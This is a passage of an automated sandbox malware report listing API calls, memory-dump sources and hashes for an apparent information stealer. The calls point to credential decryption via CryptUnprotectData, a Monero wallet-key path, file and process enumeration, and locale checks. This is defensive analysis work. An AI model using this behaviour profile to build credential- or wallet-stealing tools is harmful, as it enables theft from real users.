                            • GetKeyboardLayoutList.USER32(00000000,00000000,003A05AF), ref: 00397BE1
                            • LocalAlloc.KERNEL32(00000040,?), ref: 00397BF9
                            • GetKeyboardLayoutList.USER32(?,00000000), ref: 00397C0D
                            • GetLocaleInfoA.KERNEL32(?,00000002,?,00000200), ref: 00397C62
                            • LocalFree.KERNEL32(00000000), ref: 00397D22
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.1800208993.0000000000381000.00000040.00000001.01000000.00000003.sdmp, Offset: 00380000, based on PE: true
                            • Associated: 00000000.00000002.1800196481.0000000000380000.00000004.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1800208993.0000000000431000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1800208993.000000000043D000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1800208993.0000000000462000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1800208993.00000000005CA000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1800322327.00000000005DE000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1800322327.0000000000767000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1800322327.0000000000841000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1800322327.0000000000865000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1800322327.000000000086D000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1800322327.000000000087B000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1800505145.000000000087C000.00000080.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1800591244.0000000000A18000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1800603025.0000000000A19000.00000080.00000001.01000000.00000003.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_380000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: KeyboardLayoutListLocal$AllocFreeInfoLocalelstrcpy
                            • String ID: /
                            • API String ID: 3090951853-4001269591
                            • Opcode ID: e13667c04cfc850577ac91fdb1150bd9d1f2ad6aabe688eaae2bccbd9f1c4d0d
                            • Instruction ID: 80e97e073348eac0fe9352ec6d92739cfdacc90ccade130b803cc1e2d0414caf
                            • Opcode Fuzzy Hash: e13667c04cfc850577ac91fdb1150bd9d1f2ad6aabe688eaae2bccbd9f1c4d0d
                            • Instruction Fuzzy Hash: 5A415A7191062CABDF25DB94DC99BEEB7B8FF44700F204299E00966180DB342F89CFA1
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.1800322327.00000000005DE000.00000040.00000001.01000000.00000003.sdmp, Offset: 00380000, based on PE: true
                            • Associated: 00000000.00000002.1800196481.0000000000380000.00000004.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1800208993.0000000000381000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1800208993.0000000000431000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1800208993.000000000043D000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1800208993.0000000000462000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1800208993.00000000005CA000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1800322327.0000000000767000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1800322327.0000000000841000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1800322327.0000000000865000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1800322327.000000000086D000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1800322327.000000000087B000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1800505145.000000000087C000.00000080.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1800591244.0000000000A18000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1800603025.0000000000A19000.00000080.00000001.01000000.00000003.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_380000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID:
                            • String ID: %-]~$Gu}$aa?:$q<=$q<=$g{$!6t
                            • API String ID: 0-2122644379
                            • Opcode ID: 16d4062ef4f9b1e01738cef17e70eb629c3959dd3236327e5b299e93c5346b7d
                            • Instruction ID: 1ba0e817f022a031a7d998290648818f35687f2ddf4eeb3fa6df4140a8eb175a
                            • Opcode Fuzzy Hash: 16d4062ef4f9b1e01738cef17e70eb629c3959dd3236327e5b299e93c5346b7d
                            • Instruction Fuzzy Hash: 9C9204F360C2009FE308AF29EC8567ABBE9EF94720F16493DEAC487744E63558458797
                            APIs
                              • Part of subcall function 0039A740: lstrcpy.KERNEL32(003A0E17,00000000), ref: 0039A788
                              • Part of subcall function 0039A920: lstrcpy.KERNEL32(00000000,?), ref: 0039A972
                              • Part of subcall function 0039A920: lstrcat.KERNEL32(00000000), ref: 0039A982
                              • Part of subcall function 0039A9B0: lstrlen.KERNEL32(?,01158FE0,?,\Monero\wallet.keys,003A0E17), ref: 0039A9C5
                              • Part of subcall function 0039A9B0: lstrcpy.KERNEL32(00000000), ref: 0039AA04
                              • Part of subcall function 0039A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 0039AA12
                              • Part of subcall function 0039A8A0: lstrcpy.KERNEL32(?,003A0E17), ref: 0039A905
                            • FindFirstFileA.KERNEL32(00000000,?,00000000,?,?,?,\*.*,003A0D73), ref: 0038E4A2
                            • StrCmpCA.SHLWAPI(?,003A14F8), ref: 0038E4F2
                            • StrCmpCA.SHLWAPI(?,003A14FC), ref: 0038E508
                            • FindNextFileA.KERNEL32(000000FF,?), ref: 0038EBDF
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.1800208993.0000000000381000.00000040.00000001.01000000.00000003.sdmp, Offset: 00380000, based on PE: true
                            • Associated: 00000000.00000002.1800196481.0000000000380000.00000004.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1800208993.0000000000431000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1800208993.000000000043D000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1800208993.0000000000462000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1800208993.00000000005CA000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1800322327.00000000005DE000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1800322327.0000000000767000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1800322327.0000000000841000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1800322327.0000000000865000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1800322327.000000000086D000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1800322327.000000000087B000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1800505145.000000000087C000.00000080.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1800591244.0000000000A18000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1800603025.0000000000A19000.00000080.00000001.01000000.00000003.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_380000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: lstrcpy$FileFindlstrcat$FirstNextlstrlen
                            • String ID: \*.*
                            • API String ID: 433455689-1173974218
                            • Opcode ID: 8e3ef79709e35466cc41d15fda64aeca2a5a074b24679d1d4ccd318790550f51
                            • Instruction ID: 9a79cb98fdb2171a009494959310fdda1a216af0c902e4b15f9f8e1ccd601a32
                            • Opcode Fuzzy Hash: 8e3ef79709e35466cc41d15fda64aeca2a5a074b24679d1d4ccd318790550f51
                            • Instruction Fuzzy Hash: 2D1231719106189BDF1AFBA0DC96EED7778AF54300F4046A8B50A9A091EF306F49CFD2
                            APIs
                            • CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,N8,00000000,00000000), ref: 00389AEF
                            • LocalAlloc.KERNEL32(00000040,?,?,?,00384EEE,00000000,?), ref: 00389B01
                            • CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,N8,00000000,00000000), ref: 00389B2A
                            • LocalFree.KERNEL32(?,?,?,?,00384EEE,00000000,?), ref: 00389B3F
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.1800208993.0000000000381000.00000040.00000001.01000000.00000003.sdmp, Offset: 00380000, based on PE: true
                            • Associated: 00000000.00000002.1800196481.0000000000380000.00000004.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1800208993.0000000000431000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1800208993.000000000043D000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1800208993.0000000000462000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1800208993.00000000005CA000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1800322327.00000000005DE000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1800322327.0000000000767000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1800322327.0000000000841000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1800322327.0000000000865000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1800322327.000000000086D000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1800322327.000000000087B000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1800505145.000000000087C000.00000080.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1800591244.0000000000A18000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1800603025.0000000000A19000.00000080.00000001.01000000.00000003.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_380000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: BinaryCryptLocalString$AllocFree
                            • String ID: N8
                            • API String ID: 4291131564-2731101833
                            • Opcode ID: a513bb502861d5604315c42a6171bbd5164c24673da477becab628df20bf6783
                            • Instruction ID: f8444c4544b980b999141e07d1bf4384ce49e32a21bf69f7758c6885d4c407b2
                            • Opcode Fuzzy Hash: a513bb502861d5604315c42a6171bbd5164c24673da477becab628df20bf6783
                            • Instruction Fuzzy Hash: C911D2B4241308EFEB01CF64CC95FAA77B5FB89704F208089F9159B390C7B2AA01DB90
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.1800322327.00000000005DE000.00000040.00000001.01000000.00000003.sdmp, Offset: 00380000, based on PE: true
                            • Associated: 00000000.00000002.1800196481.0000000000380000.00000004.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1800208993.0000000000381000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1800208993.0000000000431000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1800208993.000000000043D000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1800208993.0000000000462000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1800208993.00000000005CA000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1800322327.0000000000767000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1800322327.0000000000841000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1800322327.0000000000865000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1800322327.000000000086D000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1800322327.000000000087B000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1800505145.000000000087C000.00000080.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1800591244.0000000000A18000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1800603025.0000000000A19000.00000080.00000001.01000000.00000003.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_380000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID:
                            • String ID: 0|-$jD% $jX{0$q(_>$w=
                            • API String ID: 0-1819484939
                            • Opcode ID: 2914506c5fc0f8c4d815bfc515650678e632ec982aac61df7262f16280cd0802
                            • Instruction ID: 99cbb71e3c299ed204990a8670e6ec9dd78f839c07120ed8594cbb8e12b8cd90
                            • Opcode Fuzzy Hash: 2914506c5fc0f8c4d815bfc515650678e632ec982aac61df7262f16280cd0802
                            • Instruction Fuzzy Hash: DCB208F3A0C2009FE3046E2DEC8567ABBE9EF94720F1A453DEAC487744EA7558058697
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.1800322327.00000000005DE000.00000040.00000001.01000000.00000003.sdmp, Offset: 00380000, based on PE: true
                            • Associated: 00000000.00000002.1800196481.0000000000380000.00000004.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1800208993.0000000000381000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1800208993.0000000000431000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1800208993.000000000043D000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1800208993.0000000000462000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1800208993.00000000005CA000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1800322327.0000000000767000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1800322327.0000000000841000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1800322327.0000000000865000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1800322327.000000000086D000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1800322327.000000000087B000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1800505145.000000000087C000.00000080.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1800591244.0000000000A18000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1800603025.0000000000A19000.00000080.00000001.01000000.00000003.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_380000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID:
                            • String ID: "uq$ZvO$cFy$rnw$&w
                            • API String ID: 0-40677860
                            • Opcode ID: ddb46a355eebd0309b32c2e7930e4f91ffb7ffa9b833302d957b0e906c74886b
                            • Instruction ID: 07d0d47f2343ce296fccec9f492eea41f15595a8f93b11fc06e40f72baec9272
                            • Opcode Fuzzy Hash: ddb46a355eebd0309b32c2e7930e4f91ffb7ffa9b833302d957b0e906c74886b
                            • Instruction Fuzzy Hash: 17B2D4F39082009FE314AE29DC8567AFBE9EF94720F1A893DEAC4C7744E63558418797
                            APIs
                            • lstrlen.KERNEL32(?,00000001,?,00000000,00000000,00000000), ref: 0038C871
                            • CryptStringToBinaryA.CRYPT32(?,00000000), ref: 0038C87C
                            • lstrcat.KERNEL32(?,003A0B46), ref: 0038C943
                            • lstrcat.KERNEL32(?,003A0B47), ref: 0038C957
                            • lstrcat.KERNEL32(?,003A0B4E), ref: 0038C978
                            Memory Dump Source
                            • Source File: 00000000.00000002.1800208993.0000000000381000.00000040.00000001.01000000.00000003.sdmp, Offset: 00380000, based on PE: true
                            • Associated: 00000000.00000002.1800196481.0000000000380000.00000004.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1800208993.0000000000431000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1800208993.000000000043D000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1800208993.0000000000462000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1800208993.00000000005CA000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1800322327.00000000005DE000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1800322327.0000000000767000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1800322327.0000000000841000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1800322327.0000000000865000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1800322327.000000000086D000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1800322327.000000000087B000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1800505145.000000000087C000.00000080.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1800591244.0000000000A18000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1800603025.0000000000A19000.00000080.00000001.01000000.00000003.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_380000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: lstrcat$BinaryCryptStringlstrlen
                            • String ID:
                            • API String ID: 189259977-0
                            • Opcode ID: c9390e0e29b6330b4b63cbd8244cae09b46a1edabf3b2c9e1ec62700b4c848e7
                            • Instruction ID: fe9466fdb3aa81d930198e6662756542708e1467587609b6b7b72e299c02e70d
                            • Opcode Fuzzy Hash: c9390e0e29b6330b4b63cbd8244cae09b46a1edabf3b2c9e1ec62700b4c848e7
                            • Instruction Fuzzy Hash: 63416E75D1421EDFDB10DFA4DD89FEEBBB8BB48308F1041A8E509A6280D7705A84DFA1
                            APIs
                            • GetSystemTime.KERNEL32(?), ref: 0039696C
                            • sscanf.NTDLL ref: 00396999
                            • SystemTimeToFileTime.KERNEL32(?,00000000), ref: 003969B2
                            • SystemTimeToFileTime.KERNEL32(?,00000000), ref: 003969C0
                            • ExitProcess.KERNEL32 ref: 003969DA
                            Memory Dump Source
                            • Source File: 00000000.00000002.1800208993.0000000000381000.00000040.00000001.01000000.00000003.sdmp, Offset: 00380000, based on PE: true
                            • Associated: 00000000.00000002.1800196481.0000000000380000.00000004.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1800208993.0000000000431000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1800208993.000000000043D000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1800208993.0000000000462000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1800208993.00000000005CA000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1800322327.00000000005DE000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1800322327.0000000000767000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1800322327.0000000000841000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1800322327.0000000000865000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1800322327.000000000086D000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1800322327.000000000087B000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1800505145.000000000087C000.00000080.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1800591244.0000000000A18000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1800603025.0000000000A19000.00000080.00000001.01000000.00000003.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_380000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: Time$System$File$ExitProcesssscanf
                            • String ID:
                            • API String ID: 2533653975-0
                            • Opcode ID: f96e8ed0e6c41b52cbf4623ce838ea9621604ca129246919722c1beb07e5aa3c
                            • Instruction ID: 1c0d60252d1f48ffed597e5a55ad1bf9d586b779a637d7e427829fae7fb44487
                            • Opcode Fuzzy Hash: f96e8ed0e6c41b52cbf4623ce838ea9621604ca129246919722c1beb07e5aa3c
                            • Instruction Fuzzy Hash: CD21EA75D1420CAFCF05EFE4D945DEEBBB5BF48304F04852AE406A3250EB345609DBA9
                            APIs
                            • GetProcessHeap.KERNEL32(00000008,00000400), ref: 0038724D
                            • RtlAllocateHeap.NTDLL(00000000), ref: 00387254
                            • CryptUnprotectData.CRYPT32(?,00000000,00000000,00000000,00000000,00000001,?), ref: 00387281
                            • WideCharToMultiByte.KERNEL32(00000000,00000000,?,?,?,00000400,00000000,00000000), ref: 003872A4
                            • LocalFree.KERNEL32(?), ref: 003872AE
                            Memory Dump Source
                            • Source File: 00000000.00000002.1800208993.0000000000381000.00000040.00000001.01000000.00000003.sdmp, Offset: 00380000, based on PE: true
                            • Associated: 00000000.00000002.1800196481.0000000000380000.00000004.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1800208993.0000000000431000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1800208993.000000000043D000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1800208993.0000000000462000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1800208993.00000000005CA000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1800322327.00000000005DE000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1800322327.0000000000767000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1800322327.0000000000841000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1800322327.0000000000865000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1800322327.000000000086D000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1800322327.000000000087B000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1800505145.000000000087C000.00000080.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1800591244.0000000000A18000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1800603025.0000000000A19000.00000080.00000001.01000000.00000003.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_380000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: Heap$AllocateByteCharCryptDataFreeLocalMultiProcessUnprotectWide
                            • String ID:
                            • API String ID: 2609814428-0
                            • Opcode ID: a78d74ef730aa6eab40973c3b3bf991248d381f490d962ce304d20c85af65c8c
                            • Instruction ID: a1473e8d7eb55f4590928e8e807310a642b398fb03e812cecbd6613e7de44a77
                            • Opcode Fuzzy Hash: a78d74ef730aa6eab40973c3b3bf991248d381f490d962ce304d20c85af65c8c
                            • Instruction Fuzzy Hash: DC011275A40308BFEB14DFE4CD4AF9D7BB8EB44704F104555FB05AB2C0D670AA049B65
                            APIs
                            • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 0039961E
                            • Process32First.KERNEL32(003A0ACA,00000128), ref: 00399632
                            • Process32Next.KERNEL32(003A0ACA,00000128), ref: 00399647
                            • StrCmpCA.SHLWAPI(?,00000000), ref: 0039965C
                            • CloseHandle.KERNEL32(003A0ACA), ref: 0039967A
                            Memory Dump Source
                            • Source File: 00000000.00000002.1800208993.0000000000381000.00000040.00000001.01000000.00000003.sdmp, Offset: 00380000, based on PE: true
                            • Associated: 00000000.00000002.1800196481.0000000000380000.00000004.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1800208993.0000000000431000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1800208993.000000000043D000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1800208993.0000000000462000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1800208993.00000000005CA000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1800322327.00000000005DE000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1800322327.0000000000767000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1800322327.0000000000841000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1800322327.0000000000865000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1800322327.000000000086D000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1800322327.000000000087B000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1800505145.000000000087C000.00000080.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1800591244.0000000000A18000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1800603025.0000000000A19000.00000080.00000001.01000000.00000003.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_380000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: Process32$CloseCreateFirstHandleNextSnapshotToolhelp32
                            • String ID:
                            • API String ID: 420147892-0
                            • Opcode ID: 072a397b65f9a142fed76b571b4c79048c16dcbfbea374d7653b1647ab724729
                            • Instruction ID: 92001967a9b51b1a9a1caa7c455302ce4578fb0f9cb137820c98b675791336ed
                            • Opcode Fuzzy Hash: 072a397b65f9a142fed76b571b4c79048c16dcbfbea374d7653b1647ab724729
                            • Instruction Fuzzy Hash: 6801E5B5A00208AFCF15DFA9CD48BEDBBF8EB58314F104189A90AA6240EB349A44DF51
                            APIs
                            • CryptBinaryToStringA.CRYPT32(00000000,00385184,40000001,00000000,00000000,?,00385184), ref: 00398EC0
                            Memory Dump Source
                            • Source File: 00000000.00000002.1800208993.0000000000381000.00000040.00000001.01000000.00000003.sdmp, Offset: 00380000, based on PE: true
                            • Associated: 00000000.00000002.1800196481.0000000000380000.00000004.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1800208993.0000000000431000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1800208993.000000000043D000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1800208993.0000000000462000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1800208993.00000000005CA000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1800322327.00000000005DE000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1800322327.0000000000767000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1800322327.0000000000841000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1800322327.0000000000865000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1800322327.000000000086D000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1800322327.000000000087B000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1800505145.000000000087C000.00000080.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1800591244.0000000000A18000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1800603025.0000000000A19000.00000080.00000001.01000000.00000003.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_380000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: BinaryCryptString
                            • String ID:
                            • API String ID: 80407269-0
                            • Opcode ID: 28782000c955892bf6cae6a2a13f734c4fb86f7b166ca9d1d1c436a700a90a5e
                            • Instruction ID: 95de1232023111142a99b249e16509b9fce0f1d2a6f817128bc6c96078243a7c
                            • Opcode Fuzzy Hash: 28782000c955892bf6cae6a2a13f734c4fb86f7b166ca9d1d1c436a700a90a5e
                            • Instruction Fuzzy Hash: 26111C70600208BFDF01CF64E884FA737A9AF8A304F109448F9158B250DB35EC41DB60
                            APIs
                            • GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,00000000,00000000,?,0115E220,00000000,?,003A0E10,00000000,?,00000000,00000000), ref: 00397A63
                            • RtlAllocateHeap.NTDLL(00000000), ref: 00397A6A
                            • GetTimeZoneInformation.KERNEL32(?,?,?,?,00000000,00000000,?,0115E220,00000000,?,003A0E10,00000000,?,00000000,00000000,?), ref: 00397A7D
                            • wsprintfA.USER32 ref: 00397AB7
                            Memory Dump Source
                            • Source File: 00000000.00000002.1800208993.0000000000381000.00000040.00000001.01000000.00000003.sdmp, Offset: 00380000, based on PE: true
                            • Associated: 00000000.00000002.1800196481.0000000000380000.00000004.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1800208993.0000000000431000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1800208993.000000000043D000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1800208993.0000000000462000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1800208993.00000000005CA000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1800322327.00000000005DE000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1800322327.0000000000767000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1800322327.0000000000841000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1800322327.0000000000865000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1800322327.000000000086D000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1800322327.000000000087B000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1800505145.000000000087C000.00000080.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1800591244.0000000000A18000.00000040.00000001.01000000.00000003.sdmp
